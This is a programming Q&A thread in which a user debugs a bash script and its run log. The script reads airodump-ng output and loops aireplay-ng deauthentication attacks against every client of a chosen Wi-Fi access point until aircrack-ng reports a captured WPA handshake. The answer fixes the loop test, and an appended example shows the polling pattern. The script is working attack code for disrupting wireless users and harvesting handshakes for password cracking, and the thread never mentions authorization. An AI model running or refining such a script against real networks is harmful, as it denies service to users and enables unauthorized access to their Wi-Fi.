Trying to figure out how to get this until loop to kill the script when it actually has any data returned. I've tried -z, -n etc. with no luck. This script is designed to take any airodump-ng output for a specific BSSID (in CSV format), and iterate through each station and deauthenticate them infinitely on a period of 5m until $SUCCESS returns that a 4-way handshake was captured.

Any help would be greatly appreciated!

#!/bin/bash
#Need to get the BSSID Name
echo "BSSID Name? (Case Sensitive): "
read BSSIDNAME

BSSID=$(cat "$1" | awk -F',' 'NR>2{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d' | sed -n 1p)

until [ "$SUCCESS" -n ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' | sed -e '/^.$/d' ); do
          aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
          sleep 5s;
  done
SUCCESS=$(aircrack-ng "${BSSIDNAME}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

Here is the debug output. You can see that it loops even though we received a handshake.

root@Pineapple:/sd/pcap# sh -x ./autodeauth.sh attackme-01.csv
+ echo BSSID Name? (Case Sensitive):
BSSID Name? (Case Sensitive):
+ read BSSIDNAME
attackme
+ + + sed -n 1p
awk -F, NR>2{print $1}
sed -e /Station MAC/d -e /BSSID/d -e /\n/d
+ cat attackme-01.csv
+ BSSID=00:11:11:11:11:11
+ [  -n ]
sh: -n: unknown operand
+ awk+  -F,sed+  NR>5{print $1} -esed
 /Station MAC/d -e -e /^.$/d /BSSID/d

+ cat attackme-01.csv
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:00 wlan1mon
05:41:31  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:31  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
05:41:32  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|60 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|55 ACKs]
05:41:33  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|56 ACKs]
05:41:34  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:00] [ 0|58 ACKs]
+ sleep 5s
+ aireplay-ng --deauth 5 -a 00:11:11:11:11:11 -c DE:AD:BE:EF:00:01 wlan1mon
05:41:39  Waiting for beacon frame (BSSID: 00:11:11:11:11:11) on channel 6
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|49 ACKs]
05:41:40  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|56 ACKs]
05:41:41  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|60 ACKs]
05:41:42  Sending 64 directed DeAuth. STMAC: [DE:AD:BE:EF:00:01] [ 0|63 ACKs]
+ sleep 5s
+ grep WPA (. handshake)
+ aircrack-ng attackme-01.cap -w fakewordlist
+ SUCCESS=   1  00:11:11:11:11:11  attackeme                     WPA (1 handshake)
+ [    1  00:11:11:11:11:11  attackme                     WPA (1 handshake) -n ]
sh: -n: unknown operand
dobbs

1 Answer

3

The line:

SUCCESS=$(something)

will run something once and store the output into the SUCCESS environment variable.

Your until loop body never runs that command explicitly so I think you may believe that $SUCCESS in the until statement is somehow running the command.

That is not the case. It's simply re-evaluating the SUCCESS variable. You need to explicitly re-run the command, such as with:

SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
until [ -n "$SUCCESS" ]; do
  for STATION in $(cat "$1" | awk -F',' 'NR>5{print $1}' | sed -e '/Station MAC/d' -e '/BSSID/d' -e '/\n/d'); do
    aireplay-ng --deauth 5 -a $BSSID -c $STATION wlan1mon;
    sleep 5m;
  done
  SUCCESS=$(aircrack-ng "${BSSID}-01.cap" -w fakewordlist | grep "WPA (. handshake)")
done

Without that penultimate line, the SUCCESS variable is never actually changing, which would explain why your loop never exits.


You'll hopefully notice the other change that I made to your code, that of changing the line:

until [ "$SUCCESS" -n ]; do

into:

until [ -n "$SUCCESS" ]; do

The latter is the correct way to test if the SUCCESS environment variable holds a non-empty string.

paxdiablo
  • This is helpful as it identified an issue with my logic, but I'm still not able to evaluate whether or not $SUCCESS returns any value, thus making it True. Updating the original post to reflect changes – dobbs Aug 17 '15 at 05:39
  • @dobbs, see my final paragraph. Your update clearly still has the `-n` *after* the thing being evaluated, *not* before. It should be `until [ -n "$SUCCESS" ] ...`, not `until [ "$SUCCESS" -n ] ...`. – paxdiablo Aug 17 '15 at 05:54
  • Missed that detail. Thank you!! :) – dobbs Aug 17 '15 at 05:58
  • @dobbs, if you missed it, then others may too. I'll modify the answer to try make it more obvious. – paxdiablo Aug 17 '15 at 05:59
  • I would have upvoted, except you retained the `cat`: http://www.smallo.ruhr.de/award.html – cdarke Aug 17 '15 at 06:23
  • @cdarke, I retained the `cat` because it's totally irrelevant to the question or answer - actually I didn't so much 'retain it' (an action) as I did 'not bother to change it' (an inaction). I'm sure there's probably a dozen *other* ways I could have improved the code but saw no need to :-) – paxdiablo Aug 17 '15 at 06:26
  • Now this has just become pure mental masturbation. Thanks for the eyes on -n. That's all I was asking for. – dobbs Aug 17 '15 at 23:10
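The two points the answer makes (the `-n` operator goes before the quoted string, and the command has to be re-run inside the loop because the `until` condition only re-reads the variable) in a stand-alone form. This is an added example, not code from the question or the answer: the function names `check_once` and `wait_for_match` are made up for it, and a constructed log file polled with `grep` stands in for `aircrack-ng` so that it runs offline.

```bash
#!/bin/bash
# Added example (not code from the question or the answer): the "re-run the
# command on every iteration" pattern the answer describes, with the corrected
# `[ -n "$var" ]` test. A constructed log file and grep stand in for the
# aircrack-ng call, so the example runs offline.

# check_once FILE PATTERN: print the first line of FILE matching PATTERN, or
# nothing. grep's non-zero status on "no match" is deliberately swallowed so a
# caller running under `set -e` can rely purely on the output being empty or not.
check_once() {
  grep -m1 -e "$2" "$1" 2>/dev/null || true
}

# wait_for_match FILE PATTERN [MAX_TRIES] [INTERVAL]: poll check_once until it
# prints something. Prints the matching line and returns 0 on success; returns 1
# after MAX_TRIES checks that all came back empty.
wait_for_match() {
  local file=$1 pattern=$2 max_tries=${3:-10} interval=${4:-1}
  local tries=1 result
  # The variable holds whatever the command printed at assignment time.
  result=$(check_once "$file" "$pattern")
  # Correct test: the -n operator comes BEFORE the quoted string.
  until [ -n "$result" ]; do
    if [ "$tries" -ge "$max_tries" ]; then
      return 1
    fi
    tries=$((tries + 1))
    sleep "$interval"
    # Re-assign inside the loop: the until condition only re-reads the
    # variable, it never re-runs the command on its own.
    result=$(check_once "$file" "$pattern")
  done
  printf '%s\n' "$result"
}

# Demo on a constructed log file: the line we wait for is appended by a
# background job one second in, so the first check is empty and a later one
# succeeds. Nothing below is needed by the functions above.
demo_file=$(mktemp)
printf 'starting capture\nno handshake yet\n' > "$demo_file"
( sleep 1; printf 'WPA (1 handshake)\n' >> "$demo_file" ) &
if wait_for_match "$demo_file" 'handshake' 5 1; then
  echo "demo: pattern found"
else
  echo "demo: timed out"
fi
wait
rm -f "$demo_file"
```

The same structure applies to the original script: assign the result of the check before the `until`, and assign it again as the last statement of the loop body; the `-n` test then sees a non-empty string on the first iteration after the check succeeds and the loop ends.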